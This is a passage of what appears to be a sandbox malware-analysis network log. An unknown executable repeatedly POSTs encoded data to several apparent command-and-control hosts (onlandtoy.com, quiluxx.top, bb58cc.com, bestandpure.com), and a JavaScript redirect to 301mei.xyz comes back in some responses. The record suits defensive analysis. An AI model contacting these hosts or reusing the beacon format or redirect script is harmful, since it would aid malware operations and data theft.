                            Data Ascii: 9O~00cbsy=mvPm>T4*>1gxT>!U9a!B4Py|t5<U#oPDm&RCKc1~2):7^R7B3,VeT8_(V3.84^1 t0"YzKGgA `e!vQ %<aAfsh9,Da
                            Jul 16, 2024 07:23:05.706733942 CEST | 1236 | IN | Data Raw: 3f 79 47 d9 87 b9 c3 76 bd 22 66 99 70 b5 ec bb a1 35 05 71 b9 f8 4d e5 49 c7 3c 3e ac c8 c0 4a c4 2d 29 2a 48 13 f1 43 78 c2 b0 55 93 08 4e c6 40 35 16 f0 52 e6 d2 93 bf 93 b5 9f 10 7b 88 bc fc 3b 71 24 23 b5 b0 25 03 1a 1b 8d 7f f8 31 eb 05 52
                            Data Ascii: ?yGv"fp5qMI<>J-)*HCxUN@5R{;q$#%1R-$XN_'P15z8LX}AtLDGHO]%c9!k#+PA"K7-iDDcCWs:<!<%HYG;4,awDP-Hjfy5T`U3]AGh#*Xar
                            Jul 16, 2024 07:23:05.706765890 CEST | 1236 | IN | Data Raw: 7a 6a 69 5c ae 9e 47 06 a0 89 f7 46 a7 4b 4b 87 b4 78 99 8d ef 30 6a 8a ad 11 18 61 b0 72 d6 44 3a 70 75 cd 1b 83 23 0f 8e 06 90 b4 2f 78 42 8c 82 e7 22 e3 68 c8 2b 97 a9 1a 91 27 29 2b 01 9d 98 ef df 8f 6b d2 23 b6 e9 b7 d7 66 f9 cd d6 17 0f 4b
                            Data Ascii: zji\GFKKx0jarD:pu#/xB"h+')+k#fKB^L|Z/pFIM;s.Se@dnRFt9u d\N])BvAZJG![t;yvYR\a%<C7SyVA0dsF9IxL
                            Jul 16, 2024 07:23:05.706801891 CEST | 672 | IN | Data Raw: 8a 37 75 9c f6 01 d7 f8 2d 6b f2 98 4b be 01 34 75 6c 09 73 96 2e 8e 7c 41 f6 7b f4 05 a4 39 67 9e 63 ac dd 3a f6 87 cd cf 1d da 50 8b 12 6b 47 f9 5e 07 41 4b e4 25 39 f3 79 dd 78 77 bc 5e 86 eb ba c1 a7 ef 79 75 2c 76 d3 27 25 9e e3 65 b9 76 46
                            Data Ascii: 7u-kK4uls.|A{9gc:PkG^AK%9yxw^yu,v'%evF?v=PC_+9P;tk8Z|`u1&1:J~/@?g,7s_.<mb2rBh;YiveHd}Yqe
                            Jul 16, 2024 07:23:05.707444906 CEST | 1236 | IN | Data Raw: 21 bb de 6d 88 37 19 60 bc f4 19 c9 bc a4 50 3c 53 d3 57 15 fd 4b cc 7f 29 51 05 32 0d 4c 64 dd 63 37 29 59 11 11 38 f1 0e 4b ec b0 d1 d1 64 25 1d 36 03 4f 6e 99 9e d0 91 85 ea ef 05 68 b6 00 c3 c2 19 16 2a 19 56 f2 6b 16 54 4c 95 9c c1 84 f7 20
                            Data Ascii: !m7`P<SWK)Q2Ldc7)Y8Kd%6Onh*VkTL U )t7)|z4n\`qpih[a%B6MTgADYFY*Eb)X'!&ED),58+Z)"IDM/5
                            Jul 16, 2024 07:23:05.707479954 CEST | 1236 | IN | Data Raw: 59 83 47 c3 19 69 a3 ec 01 bc 84 6d b2 07 d4 92 36 c9 1e 90 f7 b0 45 f6 c0 72 33 1b e4 e6 08 cb db 1e fb e0 da c7 e6 d8 03 cf 1e b6 c6 1e 58 76 b7 31 f6 40 b2 ab 6d b1 37 8a cd b1 02 55 1b 45 67 c9 6e 0d 16 6e 8c 1c ec 0b 51 3b bf c4 13 e7 3e 50
                            Data Ascii: YGim6Er3Xv1@m7UEgnnQ;>PK{p6&K'}-e+AsaoKln1REf&dm9Li(S]CM7+T]o;k#tM)LM454~#JP~#:5;o6'+C|(J
                            Jul 16, 2024 07:23:05.707515001 CEST | 1236 | IN | Data Raw: cb a0 cd 1e 3c 12 5d b4 21 54 f3 96 0e ec 96 68 7c 37 77 27 47 72 59 48 29 24 bd 12 48 7a 39 24 c4 db f8 5a 90 52 78 06 25 f0 0c 6e 7d 0c 94 c2 5a 86 b2 32 65 36 8d 81 0d e2 89 a3 8d f7 1d 1e 87 25 c8 3a 14 5b f8 6d 97 2e 5f a1 5b c3 60 c1 e3 3a
                            Data Ascii: <]!Th|7w'GrYH)$Hz9$ZRx%n}Z2e6%:[m._[`:F-26P<anBcV`BqKtQ;'__v/RS86o{Mb8hn?`$>GN3Qz,_hE=t)"#D,&t:
                            Jul 16, 2024 07:23:05.711733103 CEST | 1236 | IN | Data Raw: 0e b3 67 54 51 8f d9 e2 23 e6 33 e7 69 d1 33 b4 e5 ce dd 3b a5 9a 03 92 a4 fe 89 ae 2a 16 d6 0a 2f 58 c5 71 40 85 72 f2 58 88 e4 2d 11 4e ee 28 7d b3 08 02 51 08 12 37 d1 98 30 ab 24 ca 4e 09 94 77 c8 90 26 c4 65 31 7b 17 25 1a 6b 6e c2 ec 5d 70
                            Data Ascii: gTQ#3i3;*/Xq@rX-N(}Q70$Nw&e1{%kn]pcq$Rjm19a8{0|Z--1>q/Bww(y$bz>Fj^HK@&&Q6d3oV[KQzZeV\fZtbb`(bSURLptpU!wkMo


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            19 | 192.168.2.4 | 49756 | 43.157.128.107 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:07.312196970 CEST | 10736 | OUT | POST /pgto/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.onlandtoy.com
                            Origin: http://www.onlandtoy.com
                            Referer: http://www.onlandtoy.com/pgto/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 4a 35 49 70 54 63 62 30 4c 6e 65 38 55 39 6f 37 6f 2f 70 72 59 66 32 5a 74 58 55 72 34 6d 6a 79 35 4d 6e 75 32 38 67 51 5a 62 49 48 68 52 76 6e 35 69 35 73 65 49 50 63 69 39 55 31 4f 44 75 47 30 34 32 7a 56 6d 75 4e 73 30 63 76 43 38 67 65 69 71 48 6e 73 59 59 4c 4b 2f 59 75 48 65 52 49 6f 4f 79 4a 69 44 6a 59 79 31 56 77 35 75 79 45 72 6a 31 33 46 6d 65 72 32 4d 48 49 61 6c 71 78 64 4e 51 6c 64 52 44 32 77 61 64 31 70 71 75 75 45 49 59 69 32 41 61 5a 42 77 68 6b 48 4c 38 50 33 51 47 44 53 77 53 4e 66 55 32 44 64 4b 51 62 78 52 33 79 74 4d 51 53 68 5a 44 50 53 43 76 51 4c 76 43 57 2f 56 4d 33 70 4e 48 35 4d 7a 6f 4d 6a 78 7a 48 4c 4d 5a 4b 75 37 55 32 69 48 35 79 44 4a 77 52 65 69 58 51 36 4f 45 6e 53 5a 79 6a 65 37 49 51 7a 6d 61 4c 48 70 77 6b 68 6a 52 31 71 32 48 66 4f 68 62 2b 39 76 66 73 57 42 58 49 54 58 7a 65 70 48 52 59 61 74 42 46 4d 47 77 56 55 56 6d 65 35 71 2f 54 69 55 65 4c 57 73 55 75 31 2f 30 69 54 31 37 42 37 74 49 2b 48 30 35 4b 67 71 6d 73 32 35 56 64 4a 6b 54 4f 33 4e [TRUNCATED]
                            Data Ascii: UbV=J5IpTcb0Lne8U9o7o/prYf2ZtXUr4mjy5Mnu28gQZbIHhRvn5i5seIPci9U1ODuG042zVmuNs0cvC8geiqHnsYYLK/YuHeRIoOyJiDjYy1Vw5uyErj13Fmer2MHIalqxdNQldRD2wad1pquuEIYi2AaZBwhkHL8P3QGDSwSNfU2DdKQbxR3ytMQShZDPSCvQLvCW/VM3pNH5MzoMjxzHLMZKu7U2iH5yDJwReiXQ6OEnSZyje7IQzmaLHpwkhjR1q2HfOhb+9vfsWBXITXzepHRYatBFMGwVUVme5q/TiUeLWsUu1/0iT17B7tI+H05Kgqms25VdJkTO3NMs83qmGcY5wjsmoSJ0lznAUQXf+MpVNpkNhywbm2C4EOokY9wU0vXJ9QP5B34F4JUuijBN5qA1w+JCZQ7QSQgayKgVJOFUfKPmT2Ou2kkDCYLJZobsq4GkJDQds/7q7yuD7m66CgOMJrt/opFrw7OgcUZs5AzJIwCJCZZFeWJfBu2OmsG/RjAclZP5LZrEE3H3t5uYB5BT0OQeS+AJKL331RBDUnwNAGBmb3NEfOHAXnq8XWGJjPD5n9ux6poXFkhAtoxBIO6u1fmbskIRkrKnA2SpnkF9ArAWl/EfnQ96koFsS9LKRzxf3WDEwPDHp37iWmD2aiKz+t0hE62uGCYwZudygbNnRF9cWMchOuvdNUdYC3A1+7BXWtEW5AB4WR1aIBhn6g+7GEIUYoMf9+0OAosOHn/aVs3do6jh3PmcU59LHChFH2Me8izxdbFT7XbfuUq9z//Fxj8xntki31YOVYNXpLkB/o5UOCRBw2xYA+6aRufEaNjFm963BW++ZlSVyXs/RKwBLDr8RZiNTVvC5WJvFAWNLVkM75dnDlRy7x0qzYy9R61wK33wGBcISVYY+gYWelMfJk7JZM7AMCP5bRbecI/3S1wDmFzX/nEeSf8niqXDBGs1a6ai+PjWawDNY9mnogbpc9I1DJEKNh6J/irVUTQksORa [TRUNCATED]
                            Jul 16, 2024 07:23:08.399075985 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:23:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Cache-Control: no-cache, must-revalidate, max-age=0
                            Link: <http://www.onlandtoy.com/wp-json/>; rel="https://api.w.org/"
                            Content-Encoding: gzip


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            20 | 192.168.2.4 | 49757 | 43.157.128.107 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:09.840444088 CEST | 367 | OUT | GET /pgto/?UbV=E7gJQqjSEHiqU9c9ksgsPN71gncF+WmU2fL1k5JHUJhFxTz44zYRR/afhYUOahGq3ZObWGCJogocVOMqr7fasKcgDvUaUtJUxsyY6DreonZJ8NGE1S91eUs=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.onlandtoy.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:23:10.928862095 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:23:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Cache-Control: no-cache, must-revalidate, max-age=0
                            Link: <http://www.onlandtoy.com/wp-json/>; rel="https://api.w.org/"
                            Data Ascii: decf<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title> &#8211; wordpress</title><link rel='dns-prefetch' href='//www.onlandtoy.com' /><link rel="alternate" type="application/rss+xml" title="wordpress &raquo; Feed" href="http://www.onlandtoy.com/feed/" /><link rel="alternate" type="application/rss+xml" title="wordpress &raquo; Feed" href="http://www.onlandtoy.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.onlandtoy.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            21 | 192.168.2.4 | 49758 | 203.161.41.205 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:16.853446960 CEST | 628 | OUT | POST /snq6/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.quiluxx.top
                            Origin: http://www.quiluxx.top
                            Referer: http://www.quiluxx.top/snq6/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=AQAJuOmyH+GEEil026lIu/RYmRLkxCtaUZnvBratOL0WRoe6ipvmtCTC4e2lVbRf8wwaxjjw4KeQQlRNndYIYHo71Q8Zn+5Xao1sniEyQ5mts6tPMzku5NLNbPkIkaj9AWv2AzPCFStQqGlrBX87LuNtn0EzchFSqBo3vO3XvTAHX03Z419hITMG7xG9zUx6MQ==
                            Jul 16, 2024 07:23:17.453159094 CEST | 533 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:23:17 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            22 | 192.168.2.4 | 49759 | 203.161.41.205 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:19.386490107 CEST | 648 | OUT | POST /snq6/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.quiluxx.top
                            Origin: http://www.quiluxx.top
                            Referer: http://www.quiluxx.top/snq6/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=AQAJuOmyH+GEEDV00blIm/Rf6hLknyteUZrvBrzwP+kWRNi6jsPmuCTChu2sY7Ru8w0sxjPw4KKQQhVNnKteaXo58w8boe5Xao1sni4UQ5OtsKdPdmEtndLOYPkIgaj5AWvYAx7kFWdQqHVrPjI4EuNRj0FZVS4rixd/lPjYsTUqSymDpEc2aTo1m2PJ+XMzXYG/kPEsQMKltoNxTJEr/Tk=
                            Jul 16, 2024 07:23:19.976408958 CEST | 533 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:23:19 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            23 | 192.168.2.4 | 49760 | 203.161.41.205 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:21.919085979 CEST | 10730 | OUT | POST /snq6/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.quiluxx.top
                            Origin: http://www.quiluxx.top
                            Referer: http://www.quiluxx.top/snq6/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:23:22.534718990 CEST | 533 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:23:22 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            24 | 192.168.2.4 | 49761 | 203.161.41.205 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:24.450658083 CEST | 365 | OUT | GET /snq6/?UbV=NSopt7KlKYWZPRkA7oY6sPxNomLcvlV5CqP+M6qmG+AJc6mQ/tzSijSCkZiEOKdTyH8X5nOn6MDLSgA5+pRURkcx9XBmg+R/K4xPlWUgSqmVkrADB3U9/MQ=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.quiluxx.top
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:23:25.054506063 CEST | 548 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:23:24 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html; charset=utf-8
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            25 | 192.168.2.4 | 49762 | 103.176.91.154 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:30.110831022 CEST | 625 | OUT | POST /sq05/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.bb58cc.com
                            Origin: http://www.bb58cc.com
                            Referer: http://www.bb58cc.com/sq05/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=1twJ7FywR8/KGoJ/1gfp7RPkhvl58utSq2w31mIZoEMm4MujGgMPs+WPHdxAsx78c11mnqgPaGlSOEj3uKDpEHv7X6c18EtJPYMNkHbPxwY2ciHufC2ityRxh7ezNR6E8r/KxQqcm4GiYMvZx8K2eKYdce48N5WQMcHzvUnkucJEvwMc09mRYXoXdEjTIUoOgQ==
                            Jul 16, 2024 07:23:30.903335094 CEST | 552 | IN | HTTP/1.0 200 OK
                            Connection: close
                            Cache-Control: max-age=259200
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 423
                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            26 | 192.168.2.4 | 49763 | 103.176.91.154 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:32.651810884 CEST | 645 | OUT | POST /sq05/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.bb58cc.com
                            Origin: http://www.bb58cc.com
                            Referer: http://www.bb58cc.com/sq05/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=1twJ7FywR8/KHJ5/0Bfp9xPn9/l5meteq2s31iZSv2om4tejHhMPgeWPM9xFiR71c14GnrcPaGxSOF/3u93oH3v1PKczyktJPYMNkHPpxwA2cRPuegehxCR+i7ezHx7N8r+fxSPHm7+iYO3ZxJm3UKYXQO5DFbCZBc2DqDOfoI9Eu2dGlMHGKXMkADqnFXVH7bV9QVvYAwK15rq/F/CWd2Q=
                            Jul 16, 2024 07:23:33.446985006 CEST | 552 | IN | HTTP/1.0 200 OK
                            Connection: close
                            Cache-Control: max-age=259200
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 423
                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            27 | 192.168.2.4 | 49764 | 103.176.91.154 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:35.185833931 CEST | 10727 | OUT | POST /sq05/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.bb58cc.com
                            Origin: http://www.bb58cc.com
                            Referer: http://www.bb58cc.com/sq05/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:23:35.993015051 CEST | 552 | IN | HTTP/1.0 200 OK
                            Connection: close
                            Cache-Control: max-age=259200
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 423
                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            28 | 192.168.2.4 | 49765 | 103.176.91.154 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:37.719692945 CEST | 364 | OUT | GET /sq05/?UbV=4vYp4xDXBquPAaly5jqpyiz8vvwHg+w1s2ckl3sNoEBm9sSVWgAmrZHKJppZ7gqiYW0PudZtcTAAOkaLjZ+tbjDRBawb/1kyJrI7kWHcwz8aVyTLSwOG2zw=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.bb58cc.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:23:38.832328081 CEST | 552 | IN | HTTP/1.0 200 OK
                            Connection: close
                            Cache-Control: max-age=259200
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 423
                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
                            Jul 16, 2024 07:23:38.832446098 CEST | 552 | IN | HTTP/1.0 200 OK
                            Connection: close
                            Cache-Control: max-age=259200
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 423
                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            29 | 192.168.2.4 | 49766 | 3.33.244.179 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:43.961586952 CEST | 640 | OUT | POST /xifn/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.bestandpure.com
                            Origin: http://www.bestandpure.com
                            Referer: http://www.bestandpure.com/xifn/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=HckgqG6UuhTDrshqoAtn9TU792EKZC+EIIHa+y+fVLLXfmVvajkQVxESHUSScoRih3nTSSLUoXs3c0Zcx22xDHF4iPH3nTryu5dotmGrNflg/nIw/EEwM2dVa8ROcCpYwxgHXjDk5J6wdK4crr6rIy1/Gk1skqcwKwygK4AttiayPrro7WDAastj7q4BZt9e7A==


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            30 | 192.168.2.4 | 49767 | 3.33.244.179 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:46.496733904 CEST | 660 | OUT | POST /xifn/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.bestandpure.com
                            Origin: http://www.bestandpure.com
                            Referer: http://www.bestandpure.com/xifn/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=HckgqG6UuhTDqNRqvj1n2TU6zWEKTi+AIIba+2GPW/nXcGlvdnQQWxESP0SXYoQsh3iuSTHUoX43cxlcxFuyFXF6qvH1ozryu5dotn2FNcVg/X4wt1EzKGdad8RONypcwxglXmbe5LCwdKIcq5SoCy00JE19nZB4GiHUN5tPyyC1HN6yqniXIsJQmtx1UuAXgK2jXaXZuATaJWIyV4ou2+I=


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            31 | 192.168.2.4 | 49768 | 3.33.244.179 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:49.031733036 CEST | 10742 | OUT | POST /xifn/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.bestandpure.com
                            Origin: http://www.bestandpure.com
                            Referer: http://www.bestandpure.com/xifn/
